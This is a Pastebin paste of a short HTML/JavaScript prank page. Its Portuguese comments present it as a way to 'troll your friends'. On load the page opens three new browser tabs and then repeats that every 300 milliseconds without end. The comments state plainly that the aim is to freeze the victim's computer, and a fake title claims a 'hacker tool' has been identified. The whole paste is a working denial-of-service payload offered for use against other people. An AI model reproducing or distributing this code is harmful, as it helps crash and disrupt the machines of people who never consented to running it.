Advertisement
garfield

[HTML/JAVASCRIPT]: Trollar seus amigos ;) (SPAM)

Aug 31st, 2012
331
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.59 KB | None | 0 0
  1. // Este código serve para trollar seus amigos, apenas salve com a extensão.HTML e execute,
  2. // o mesmo abrirá vários abas & pop-ups infinitamente que consequentemente travará o computador ;)
  3. // Criado por G.SuYaNw Dácio ;)
  4.  
  5.  
  6. <html>
  7.     <head>
  8.         <title>The hacker tool was ben identified</title>
  9.        
  10.         <script>
  11.        
  12.         function Load()
  13.         {
  14.             var Interador;
  15.             for(Interador =  0; Interador !=  3; ++Interador)
  16.             {
  17.                 window.open("http://www.google.com.br", "_blank");
  18.             }
  19.             setTimeout(function(){Load()},300);
  20.             return 1;
  21.         }
  22.         </script>
  23.     </head>
  24.     <body OnLoad='Load()' />
  25. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement